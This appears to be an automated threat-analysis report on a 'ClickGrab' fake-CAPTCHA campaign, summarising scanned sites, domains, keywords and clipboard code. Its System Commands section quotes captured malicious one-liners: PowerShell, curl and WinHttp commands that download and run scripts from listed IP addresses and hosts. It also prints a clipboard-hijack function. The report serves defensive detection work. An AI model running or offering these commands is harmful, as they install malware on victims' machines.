
Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-11 Attack Patterns

  • 100 sites
  • 20% detection rate
  • 2 PowerShell downloads

ClickGrab Threat Analysis Report - 2026-05-11

Generated on 2026-05-11 01:57:06

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 20
  • Unique domains encountered: 1,125
  • Total URLs extracted: 5,724
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 87

Domain Analysis

Most Frequently Encountered Domains

  • www.maheshwaree.com: 320 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 226 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 196 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 174 occurrences
  • www.creatorssky.com: 156 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 71 occurrences
  • sun1118.com: 54 occurrences

URL Pattern Analysis

reCAPTCHA imagery

8 occurrences across 5 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 time)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 time)

Font resources

74 occurrences across 61 distinct URLs

  • https://fonts.gstatic.com (5 times)
  • https://fonts.googleapis.com (4 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 56 more distinct URLs

CDN hosted scripts

4 occurrences across 4 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 time)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 time)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=1.8.1 (1 time)

Google resources

57 occurrences across 37 distinct URLs

  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (11 times)
  • https://fonts.googleapis.com (4 times)
  • https://www.google (3 times)
  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.creatorssky.com/google-adsppc/ (2 times)
  • ...and 32 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 483 (106 unique)

Keyword Categories

Social Engineering

44 unique keywords

  • Verification ID
  • CAPTCHA Verification
  • CaptchaCheckbox
  • Verify you are human
  • captcha_question
  • CaptchaLoading
  • captcha_word_new_400950
  • captcha_sid
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • ...and 34 more

Obfuscation Indicators

11 unique keywords

  • eval(script)
  • eval('var timeOut'+popupItems[i].id)
  • eval(
  • eval("clearTimeout(timeIn"+uid+")")
  • eval(frameContents)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • ...and 1 more

System Commands

31 unique keywords

  • exec /i http://inkbookwriters.com/verify';
  • cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
  • command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';
  • Invoke
  • cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • const command =
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • command =cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\Downloads\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";
  • command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • ...and 21 more

Verification Text

3 unique keywords

  • Hidden
  • hidden
  • ray id

Technical Terms

17 unique keywords

  • .exe
  • You will observe
  • bitmap
  • CreateThread
  • Bypass
  • failed_to_retrieve
  • .bat
  • ResponseText
  • iex
  • WinHttpRequest
  • ...and 7 more

Most Frequent Keywords

  • hidden: 41 occurrences
  • robot: 35 occurrences
  • Robot: 27 occurrences
  • failed_to_retrieve: 25 occurrences
  • CAPTCHA: 16 occurrences
  • verification: 16 occurrences
  • Verification: 15 occurrences
  • CAPTCHA Verification: 14 occurrences
  • I am not a robot: 14 occurrences
  • You will observe: 14 occurrences
  • verification-id: 14 occurrences
  • To better prove you are not a robot: 14 occurrences
  • Verification ID: 13 occurrences
  • Ray ID: 12 occurrences
  • Checking if you are human: 12 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha_0, Captcha, captcha-js, CaptchaError

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • connectToHostImplementation
  • controlSocketStateChanged
  • ProxyConnectionRefusedError
  • InstallerDialogCaptionMinimalDisplayNameCustomThe
  • ConnectionRefusedError

Clipboard Manipulation Analysis

Detected clipboard manipulation in 87 instances.

document.execCommand('copy')

Found in 36 snippets (41.4% of clipboard code)

Examples:

document.execCommand('copy')
try { document.execCommand('copy')
document.execCommand("copy")

Textarea Manipulation

Found in 39 snippets (44.8% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
ng is the safe placeholder above const textarea = document.createElement('textarea'
tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

  function setClipboardCopyData(textToCopy) {
      // Create an off-screen textarea holding the attacker-supplied command string
      const tempTextArea = document.createElement("textarea");
      tempTextArea.value = textToCopy;
      document.body.append(tempTextArea);
      // Select it and copy it to the victim's clipboard via the legacy copy command
      tempTextArea.select();
      document.execCommand("copy");
      // Remove the element so nothing visible remains on the page
      document.body.removeChild(tempTextArea);
  }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.